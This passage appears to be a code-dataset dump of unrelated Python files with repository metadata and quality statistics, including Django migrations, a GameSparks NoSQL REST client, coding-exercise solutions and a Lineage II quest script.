mibBuilder.exportSymbols("TIMETRA-CLEAR-MIB", tmnxClearName=tmnxClearName, tmnxClearAction=tmnxClearAction, tmnxClearGroups=tmnxClearGroups, tmnxClearCompliance=tmnxClearCompliance, tmnxClearCompliances=tmnxClearCompliances, timetraClearMIBModule=timetraClearMIBModule, tmnxClearLastClearedTime=tmnxClearLastClearedTime, tmnxClear=tmnxClear, tmnxClearParams=tmnxClearParams, tmnxClearNotifications=tmnxClearNotifications, tmnxClearResult=tmnxClearResult, PYSNMP_MODULE_ID=timetraClearMIBModule, tmnxClearTable=tmnxClearTable, tmnxClearNotificationsPrefix=tmnxClearNotificationsPrefix, tmnxClearObjs=tmnxClearObjs, tmnxClearConformance=tmnxClearConformance, tmnxClearErrorText=tmnxClearErrorText, tmnxClearNotificationGroup=tmnxClearNotificationGroup, tmnxClearEntry=tmnxClearEntry, tmnxClearIndex=tmnxClearIndex, tmnxClearGroup=tmnxClearGroup)
| 121.241379 | 843 | 0.755119 | 794 | 7,032 | 6.685139 | 0.201511 | 0.00942 | 0.011304 | 0.015072 | 0.350791 | 0.261869 | 0.242276 | 0.240392 | 0.240392 | 0.240392 | 0 | 0.082115 | 0.085609 | 7,032 | 57 | 844 | 123.368421 | 0.74339 | 0.046644 | 0 | 0.061224 | 0 | 0 | 0.219268 | 0.017625 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.183673 | 0 | 0.183673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb25d88b34aa87a95d720f23bdf7ee4cf0720387 | 1,846 | py | Python | apps/shows/migrations/0006_comment.py | jorgesaw/oclock | 2a78bd4d1ab40eaa65ea346cf8c37556fcbbeca5 | [
"MIT"
] | null | null | null | apps/shows/migrations/0006_comment.py | jorgesaw/oclock | 2a78bd4d1ab40eaa65ea346cf8c37556fcbbeca5 | [
"MIT"
] | null | null | null | apps/shows/migrations/0006_comment.py | jorgesaw/oclock | 2a78bd4d1ab40eaa65ea346cf8c37556fcbbeca5 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.13 on 2020-09-27 03:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shows', '0005_auto_20200923_0900'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, help_text='Date time on which the object was created.', verbose_name='created at')),
('modified', models.DateTimeField(auto_now=True, help_text='Date time on which the object was last modified.', verbose_name='modified at')),
('active', models.BooleanField(default=True, verbose_name='Activo')),
('comment', models.CharField(blank=True, max_length=210, null=True, verbose_name='comment')),
('subject', models.CharField(blank=True, max_length=50, null=True, verbose_name='subject')),
('rate', models.SmallIntegerField(default=1, verbose_name='rate')),
('ip', models.CharField(blank=True, max_length=20, null=True, verbose_name='ip')),
('status', models.CharField(choices=[('New', 'New'), ('True', 'True'), ('False', 'False')], default='New', max_length=10, verbose_name='status')),
('show', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shows.Show')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| 51.277778 | 162 | 0.627844 | 211 | 1,846 | 5.350711 | 0.417062 | 0.087688 | 0.053144 | 0.058459 | 0.254207 | 0.254207 | 0.166519 | 0.166519 | 0.166519 | 0.166519 | 0 | 0.029309 | 0.223727 | 1,846 | 35 | 163 | 52.742857 | 0.758549 | 0.024919 | 0 | 0 | 1 | 0 | 0.156841 | 0.012792 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb2d52c233b9c027a9bbeb27cc8db44cbb6c5aeb | 440 | py | Python | projects/migrations/0010_auto_20200217_0313.py | wilbrone/Awards | c4c87ca5d700a12dc8d23e2d6092ac59adada4af | [
"MIT"
] | null | null | null | projects/migrations/0010_auto_20200217_0313.py | wilbrone/Awards | c4c87ca5d700a12dc8d23e2d6092ac59adada4af | [
"MIT"
] | 11 | 2020-06-05T20:57:31.000Z | 2021-09-22T18:35:03.000Z | projects/migrations/0010_auto_20200217_0313.py | wilbrone/Awards | c4c87ca5d700a12dc8d23e2d6092ac59adada4af | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-02-17 03:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0009_auto_20200217_0306'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profile_pic',
field=models.ImageField(blank=True, default='default.png', upload_to='profile_pics'),
),
]
| 23.157895 | 97 | 0.622727 | 49 | 440 | 5.44898 | 0.816327 | 0.082397 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094801 | 0.256818 | 440 | 18 | 98 | 24.444444 | 0.721713 | 0.102273 | 0 | 0 | 1 | 0 | 0.183206 | 0.058524 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb309be7b79bab53765d51fbd9cd8102d4fe70fe | 691 | py | Python | src/news/migrations/0007_auto_20200211_0715.py | HammudElHammud/newspage | feac69bf0fa3dd6c876e88ef0daae4166b367c09 | [
"bzip2-1.0.6"
] | null | null | null | src/news/migrations/0007_auto_20200211_0715.py | HammudElHammud/newspage | feac69bf0fa3dd6c876e88ef0daae4166b367c09 | [
"bzip2-1.0.6"
] | null | null | null | src/news/migrations/0007_auto_20200211_0715.py | HammudElHammud/newspage | feac69bf0fa3dd6c876e88ef0daae4166b367c09 | [
"bzip2-1.0.6"
] | null | null | null | # Generated by Django 3.0.3 on 2020-02-11 15:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0006_auto_20200210_1343'),
]
operations = [
migrations.RemoveField(
model_name='news',
name='pic',
),
migrations.AddField(
model_name='news',
name='picname',
field=models.CharField(default=1, max_length=1000),
preserve_default=False,
),
migrations.AddField(
model_name='news',
name='picurl',
field=models.CharField(default='-', max_length=1000),
),
]
| 23.827586 | 65 | 0.551375 | 68 | 691 | 5.470588 | 0.588235 | 0.072581 | 0.104839 | 0.137097 | 0.188172 | 0.188172 | 0 | 0 | 0 | 0 | 0 | 0.086207 | 0.328509 | 691 | 28 | 66 | 24.678571 | 0.715517 | 0.065123 | 0 | 0.363636 | 1 | 0 | 0.086957 | 0.035714 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb3ef60db6f9ff267ee2587cc672fa115e129028 | 867 | py | Python | note/views.py | DisMosGit/Dodja | 0bcafede607df921b53f6ed501842d4cd03f65d6 | [
"Apache-2.0"
] | null | null | null | note/views.py | DisMosGit/Dodja | 0bcafede607df921b53f6ed501842d4cd03f65d6 | [
"Apache-2.0"
] | null | null | null | note/views.py | DisMosGit/Dodja | 0bcafede607df921b53f6ed501842d4cd03f65d6 | [
"Apache-2.0"
] | null | null | null | from rest_framework import request
from rest_framework.viewsets import ModelViewSet
from django.db.models import Q
from docker_host.permissions import IsHostOperationAllowed, HostOperationMixin
from .models import Note
from .serializer import NoteSerializer
class NoteView(ModelViewSet, HostOperationMixin):
queryset = Note.objects
serializer_class = NoteSerializer
permission_classes = [IsHostOperationAllowed]
lookup_field = 'id'
permission_kind = "no"
host_pk = "host__pk"
def get_queryset(self):
return super().get_queryset().filter(
Q(host__pk=self.kwargs.get("host__pk")),
Q(is_public=True) | Q(creator=self.request.user)).order_by('title')
def perform_create(self, serializer):
serializer.save(creator=self.request.user,
host_id=self.kwargs.get("host__pk"))
| 32.111111 | 79 | 0.723183 | 102 | 867 | 5.931373 | 0.480392 | 0.049587 | 0.056198 | 0.056198 | 0.06281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185698 | 867 | 26 | 80 | 33.346154 | 0.856941 | 0 | 0 | 0 | 0 | 0 | 0.038062 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0.05 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb4497e1dbd4469ddda01ec170a2a76d6300d046 | 456 | py | Python | Python Programs/perfect-number.py | muhammad-masood-ur-rehman/Skillrack | 71a25417c89d0efab40ee6229ccd758b26ae4312 | [
"CC0-1.0"
] | 2 | 2021-06-26T21:50:59.000Z | 2021-09-18T04:55:51.000Z | Python Programs/perfect-number.py | muhammad-masood-ur-rehman/Skillrack | 71a25417c89d0efab40ee6229ccd758b26ae4312 | [
"CC0-1.0"
] | null | null | null | Python Programs/perfect-number.py | muhammad-masood-ur-rehman/Skillrack | 71a25417c89d0efab40ee6229ccd758b26ae4312 | [
"CC0-1.0"
] | null | null | null | Perfect Number
Given a positive integer N as the input, the program must print yes if N is a perfect number. Else no must be printed.
Input Format: The first line contains N.
Output Format: The first line contains yes or no
Boundary Conditions: 1 <= N <= 999999
Example Input/Output 1:
Input: 6
Output:
yes
Example Input/Output 2:
Input: 8
Output:
no
n=int(input())
l=[i for i in range(1,n) if n%i==0]
if n==sum(l):
print("yes")
else:
print("no")
| 22.8 | 118 | 0.710526 | 88 | 456 | 3.693182 | 0.488636 | 0.027692 | 0.086154 | 0.110769 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034946 | 0.184211 | 456 | 19 | 119 | 24 | 0.836022 | 0 | 0 | 0.105263 | 0 | 0 | 0.010989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb4740d461fb0ee93b6018cfd9a391d770aa07ed | 3,152 | py | Python | gs_nosql.py | accidentalrebel/GameSparks-NoSQL-Python-Library | c278adf8cc3638c2c435157cc6514fdd12b22402 | [
"MIT"
] | null | null | null | gs_nosql.py | accidentalrebel/GameSparks-NoSQL-Python-Library | c278adf8cc3638c2c435157cc6514fdd12b22402 | [
"MIT"
] | null | null | null | gs_nosql.py | accidentalrebel/GameSparks-NoSQL-Python-Library | c278adf8cc3638c2c435157cc6514fdd12b22402 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import requests
import json
AUTH_URL = 'https://auth.gamesparks.net/restv2/auth'
GAME_URL = 'https://config2.gamesparks.net/restv2/game/'
access_token = None
stage_base_url = None
jwt_token = None
api_key = None
def authenticate(is_live = False):
global access_token
global stage_base_url
global jwt_token
global api_key
if stage_base_url:
print('Already logged in.')
return
auth_file = open(os.path.expanduser('~') + '/.gs-auth', 'r')
auth_data = json.load(auth_file)
auth_file.close()
user_name = auth_data['user_name']
password = auth_data['password']
api_key = auth_data['api_key']
access_token = get_access_token(user_name, password)
print('Access token retrieved.')
stage_base_url = get_endpoint(access_token, api_key, is_live)
if is_live:
print('Stage Base URL for LIVE retrieved.')
else:
print('Stage Base URL for PREVIEW retrieved.')
jwt_token = get_jwt_token(access_token, api_key)
print('JWT Token retrieved.\n')
def get_access_token(username, password):
url = AUTH_URL + '/user'
res = requests.get(url, auth=requests.auth.HTTPBasicAuth(username, password))
if res.status_code != 200:
print('Invalid Credentials')
return res.json()['X-GSAccessToken']
def get_jwt_token(token, api_key):
url = AUTH_URL + '/game/' + api_key + '/jwt'
res = requests.get(url, params={ 'X-GSAccessToken': token })
if res.status_code != 200:
print('Failed to get JWT Token with ' + str(res.status_code) + ' status code.')
return res.json()['X-GS-JWT']
def get_endpoint(token, api_key, is_live):
url = GAME_URL + api_key + '/endpoints'
res = requests.get(url, params={ 'X-GSAccessToken': token })
if res.status_code != 200:
print('Failed to get end points with ' + str(res.status_code) + ' status code.')
if is_live:
return res.json()['liveNosql']
return res.json()['previewNosql']
def collection_find(collection, data):
assert isinstance(data, str)
assert stage_base_url
url = stage_base_url + '/restv2/game/' + api_key + '/mongo/collection/' + collection + '/find'
headers = {
'X-GS-JWT': jwt_token,
'Content-Type': 'application/json;charset=UTF-8',
'Accept': 'application/json'
}
res = requests.post(url, data=data, headers=headers)
if res.status_code != 200:
print('Failed to find in collection with ' + str(res.status_code) + ' status code.')
return res.json()
def collection_update(collection, data):
assert isinstance(data, str)
assert stage_base_url
url = stage_base_url + '/restv2/game/' + api_key + '/mongo/collection/' + collection + '/update'
headers = {
'X-GS-JWT': jwt_token,
'Content-Type': 'application/json;charset=UTF-8',
'Accept': 'application/json'
}
res = requests.post(url, data=data, headers=headers)
if res.status_code != 200:
print('Failed to update the collection with ' + str(res.status_code) + ' status code.')
else:
print('Successfully updated the collection')
| 31.838384 | 100 | 0.660216 | 428 | 3,152 | 4.67757 | 0.21729 | 0.064935 | 0.05994 | 0.037463 | 0.468032 | 0.431069 | 0.41958 | 0.404595 | 0.37962 | 0.37962 | 0 | 0.0092 | 0.206853 | 3,152 | 98 | 101 | 32.163265 | 0.7916 | 0.006662 | 0 | 0.316456 | 0 | 0 | 0.256869 | 0.019169 | 0 | 0 | 0 | 0 | 0.050633 | 1 | 0.075949 | false | 0.050633 | 0.037975 | 0 | 0.189873 | 0.139241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb48724011f3e8bc30eb54127e0afe722aa24a7f | 2,819 | py | Python | chroma_core/migrations/0025_createsnapshotjob_destroysnapshotjob.py | intel-hpdd/-intel-manager-for-lustre | f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6 | [
"MIT"
] | 52 | 2018-09-13T03:26:23.000Z | 2022-03-25T16:51:37.000Z | chroma_core/migrations/0025_createsnapshotjob_destroysnapshotjob.py | intel-hpdd/-intel-manager-for-lustre | f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6 | [
"MIT"
] | 1,264 | 2018-06-15T19:50:57.000Z | 2022-03-28T08:19:04.000Z | chroma_core/migrations/0025_createsnapshotjob_destroysnapshotjob.py | whamcloud/intel-manager-for-lustre | f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6 | [
"MIT"
] | 27 | 2018-06-18T08:51:59.000Z | 2022-03-16T15:35:34.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2020-09-10 14:23
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("chroma_core", "0024_mountsnapshotjob_unmountsnapshotjob"),
]
operations = [
migrations.CreateModel(
name="CreateSnapshotJob",
fields=[
(
"job_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="chroma_core.Job",
),
),
("fqdn", models.CharField(help_text=b"MGS host to create the snapshot on", max_length=256)),
("fsname", models.CharField(help_text=b"Lustre filesystem name", max_length=8)),
("name", models.CharField(help_text=b"Snapshot to create", max_length=64)),
(
"comment",
models.CharField(help_text=b"Optional comment for the snapshot", max_length=1024, null=True),
),
(
"use_barrier",
models.BooleanField(
default=False,
help_text=b"Set write barrier before creating snapshot. The default value is False",
),
),
],
options={
"ordering": ["id"],
},
bases=("chroma_core.job",),
),
migrations.CreateModel(
name="DestroySnapshotJob",
fields=[
(
"job_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="chroma_core.Job",
),
),
("fqdn", models.CharField(help_text=b"MGS host to destroy the snapshot on", max_length=256)),
("fsname", models.CharField(help_text=b"Lustre filesystem name", max_length=8)),
("name", models.CharField(help_text=b"Snapshot to destroy", max_length=64)),
("force", models.BooleanField(default=False, help_text=b"Destroy the snapshot with force")),
],
options={
"ordering": ["id"],
},
bases=("chroma_core.job",),
),
]
| 37.586667 | 113 | 0.476765 | 247 | 2,819 | 5.283401 | 0.368421 | 0.055172 | 0.062069 | 0.123372 | 0.591571 | 0.57318 | 0.57318 | 0.45977 | 0.45977 | 0.45977 | 0 | 0.023227 | 0.419652 | 2,819 | 74 | 114 | 38.094595 | 0.77445 | 0.024477 | 0 | 0.58209 | 1 | 0 | 0.187477 | 0.014561 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.044776 | 0 | 0.089552 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb49ee088fa33d9f59b710ec0865860ddf2f7c81 | 564 | py | Python | easy/maximum number of words you can type/solurion.py | ilya-sokolov/leetcode | ad421111d0d7c5ec5245f33552e94a373b6fd426 | [
"MIT"
] | 4 | 2021-06-03T22:19:13.000Z | 2021-10-05T18:14:12.000Z | easy/maximum number of words you can type/solurion.py | ilya-sokolov/leetcode | ad421111d0d7c5ec5245f33552e94a373b6fd426 | [
"MIT"
] | null | null | null | easy/maximum number of words you can type/solurion.py | ilya-sokolov/leetcode | ad421111d0d7c5ec5245f33552e94a373b6fd426 | [
"MIT"
] | null | null | null | class Solution:
def canBeTypedWords(self, text: str, brokenLetters: str) -> int:
result = 0
words = text.split(" ")
set_chars = set(brokenLetters)
for i in words:
set_word = set(i)
sub = set_word - set_chars
if len(set_word) == len(sub):
result += 1
return result
s = Solution()
print(s.canBeTypedWords("hello world", "ad"))
print(s.canBeTypedWords("leet code", "lt"))
print(s.canBeTypedWords("leet code", "e"))
print(s.canBeTypedWords("assembly is the best", "z"))
| 29.684211 | 68 | 0.585106 | 70 | 564 | 4.642857 | 0.542857 | 0.073846 | 0.258462 | 0.153846 | 0.178462 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004902 | 0.276596 | 564 | 18 | 69 | 31.333333 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0.099291 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.1875 | 0.25 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb4db26251eb639d46ce3715d1158347bc8822e9 | 864 | py | Python | examples/main.py | vnpnh/Pyvalo | ca9594ab4eb5620c0c5ef4d0fe0e139353986520 | [
"MIT"
] | null | null | null | examples/main.py | vnpnh/Pyvalo | ca9594ab4eb5620c0c5ef4d0fe0e139353986520 | [
"MIT"
] | null | null | null | examples/main.py | vnpnh/Pyvalo | ca9594ab4eb5620c0c5ef4d0fe0e139353986520 | [
"MIT"
] | null | null | null | import valorant
from valorant.utils.gameplay import check_buy_phase
from valorant.utils.gameplay import enemy_score_info, own_score_info
import time
from valorant.utils.helper import apply_config
# default config
# valo = valorant.config()
# custom config
valo = valorant.config(tesseract=r'D:\Program Files\Tesseract-OCR\tesseract.exe')
print(valo.__module__)
"""
Tesseract Path: D:\Program Files\Tesseract-OCR\tesseract.exe
check_money_pos: (250, 120, 110, 55)
check_buy_phase Path: (810, 140, 310, 140)
enemy_score_info: (750, 25, 100, 55)
own_score_info Path: (1050, 25, 100, 55)
time_left_pos: (900, 25, 100, 55)
failsafe Path: True
"""
print(valo.buy_phase_coor) # (810, 140, 310, 140)
print("======")
# print(isinstance(valo, valo.__module__))
# print(check_buy_phase(valo))
time.sleep(1)
print(enemy_score_info(valo))
# print(own_score_info()) | 27 | 81 | 0.753472 | 133 | 864 | 4.646617 | 0.37594 | 0.087379 | 0.082524 | 0.080906 | 0.220065 | 0.119741 | 0.119741 | 0 | 0 | 0 | 0 | 0.08724 | 0.111111 | 864 | 32 | 82 | 27 | 0.717448 | 0.194444 | 0 | 0 | 0 | 0 | 0.124069 | 0.081886 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.454545 | 0 | 0.454545 | 0.363636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bb4e5523639c4a91fc5222ca7f3564f00d36171e | 436 | py | Python | login/migrations/0005_employee_username.py | mankek/Time-Tracker | 4e8c3eaf669ca75d290eeb5a8bb7d9e23fc959bb | [
"MIT"
] | 6 | 2019-01-30T06:05:37.000Z | 2022-01-28T10:52:06.000Z | login/migrations/0005_employee_username.py | mankek/Time-Tracker | 4e8c3eaf669ca75d290eeb5a8bb7d9e23fc959bb | [
"MIT"
] | 1 | 2021-03-03T14:25:21.000Z | 2022-03-23T13:36:42.000Z | login/migrations/0005_employee_username.py | mankek/Time-Tracker | 4e8c3eaf669ca75d290eeb5a8bb7d9e23fc959bb | [
"MIT"
] | 5 | 2019-01-30T06:05:37.000Z | 2022-03-01T13:12:06.000Z | # Generated by Django 2.1 on 2018-10-10 22:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0004_auto_20181010_1640'),
]
operations = [
migrations.AddField(
model_name='employee',
name='Username',
field=models.CharField(default='None', max_length=50),
preserve_default=False,
),
]
| 21.8 | 66 | 0.600917 | 46 | 436 | 5.565217 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102894 | 0.286697 | 436 | 19 | 67 | 22.947368 | 0.720257 | 0.098624 | 0 | 0 | 1 | 0 | 0.122762 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb4f6cecef3858e27583257bcccf7772bacf1898 | 3,345 | py | Python | datapack/data/scripts/custom/6667_ClanManager/__init__.py | DigitalCoin1/L2SPERO | f9ec069804d7bf13f9c4bfb508db2eb6ce37ab94 | [
"Unlicense"
] | null | null | null | datapack/data/scripts/custom/6667_ClanManager/__init__.py | DigitalCoin1/L2SPERO | f9ec069804d7bf13f9c4bfb508db2eb6ce37ab94 | [
"Unlicense"
] | null | null | null | datapack/data/scripts/custom/6667_ClanManager/__init__.py | DigitalCoin1/L2SPERO | f9ec069804d7bf13f9c4bfb508db2eb6ce37ab94 | [
"Unlicense"
] | null | null | null | import sys
from com.l2jfrozen.gameserver.model.actor.instance import L2PcInstance
from com.l2jfrozen.gameserver.model.actor.instance import L2NpcInstance
from java.util import Iterator
from com.l2jfrozen.util.database import L2DatabaseFactory
from com.l2jfrozen.gameserver.model.quest import State
from com.l2jfrozen.gameserver.model.quest import QuestState
from com.l2jfrozen.gameserver.model.quest.jython import QuestJython as JQuest
qn = "6667_ClanManager"
NPC=[66667]
REQUESTED_ITEM=3470
REQUESTED_AMOUNT=2
NEW_REP_SCORE=3000000
QuestId = 6667
QuestName = "ClanManager"
QuestDesc = "custom"
InitialHtml = "66667-1.htm"
print "INFO Clan Manager (66667) Enabled..."
class Quest (JQuest) :
def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)
def onEvent(self,event,st):
htmltext = "<html><head><body>I have nothing to say you</body></html>"
count=st.getQuestItemsCount(REQUESTED_ITEM)
if event == "66667-clanOk.htm" :
if st.getPlayer().isClanLeader() and st.getPlayer().getClan().getLevel()<8:
if st.getPlayer().isNoble() and count >= REQUESTED_AMOUNT:
htmltext=event
st.getPlayer().getClan().changeLevel(8)
st.playSound("ItemSound.quest_finish")
st.takeItems(REQUESTED_ITEM,REQUESTED_AMOUNT)
else :
htmltext="66667-no_clan.htm"
st.exitQuest(1)
else :
htmltext="66667-no_clan.htm"
st.exitQuest(1)
elif event == "66667-repOk.htm" :
if st.getPlayer().isClanLeader() and st.getPlayer().getClan().getLevel() >= 5 and st.getPlayer().getClan().getReputationScore() < NEW_REP_SCORE :
if st.getPlayer().isNoble() and count > REQUESTED_AMOUNT:
htmltext=event
st.getPlayer().getClan().setReputationScore(NEW_REP_SCORE, 1);
st.playSound("ItemSound.quest_finish")
st.takeItems(REQUESTED_ITEM,REQUESTED_AMOUNT)
else :
htmltext="66667-no_points.htm"
st.exitQuest(1)
else :
htmltext="66667-no_points.htm"
st.exitQuest(1)
return htmltext
def onTalk (self,npc,player):
htmltext = "<html><head><body>I have nothing to say you</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
if id == CREATED :
htmltext="66667-1.htm"
elif id == COMPLETED :
htmltext = "<html><head><body>This quest have already been completed.</body></html>"
else :
st.exitQuest(1)
return htmltext
QUEST = Quest(6667,qn,"custom")
CREATED = State('Start', QUEST)
STARTING = State('Starting', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
for npcId in NPC:
QUEST.addStartNpc(npcId)
QUEST.addTalkId(npcId)
| 40.301205 | 164 | 0.577578 | 352 | 3,345 | 5.403409 | 0.326705 | 0.05205 | 0.050473 | 0.068349 | 0.500526 | 0.459516 | 0.440589 | 0.396425 | 0.343849 | 0.281809 | 0 | 0.041138 | 0.316891 | 3,345 | 82 | 165 | 40.792683 | 0.791247 | 0 | 0 | 0.333333 | 0 | 0 | 0.13722 | 0.026906 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.111111 | null | null | 0.013889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb5006edc83591fcb6fd014b194938e915e15b68 | 9,487 | py | Python | python/oskar/vis_header.py | happyseayou/OSKAR | 3fb995ed39deb6b11da12524e8e30f0ca8f9c39b | [
"BSD-3-Clause"
] | 46 | 2015-12-15T14:24:16.000Z | 2022-01-24T16:54:49.000Z | python/oskar/vis_header.py | happyseayou/OSKAR | 3fb995ed39deb6b11da12524e8e30f0ca8f9c39b | [
"BSD-3-Clause"
] | 37 | 2016-08-04T17:53:03.000Z | 2022-03-10T10:22:01.000Z | python/oskar/vis_header.py | happyseayou/OSKAR | 3fb995ed39deb6b11da12524e8e30f0ca8f9c39b | [
"BSD-3-Clause"
] | 32 | 2016-05-09T10:30:11.000Z | 2022-01-26T07:55:27.000Z | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016-2020, The University of Oxford
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the University of Oxford nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
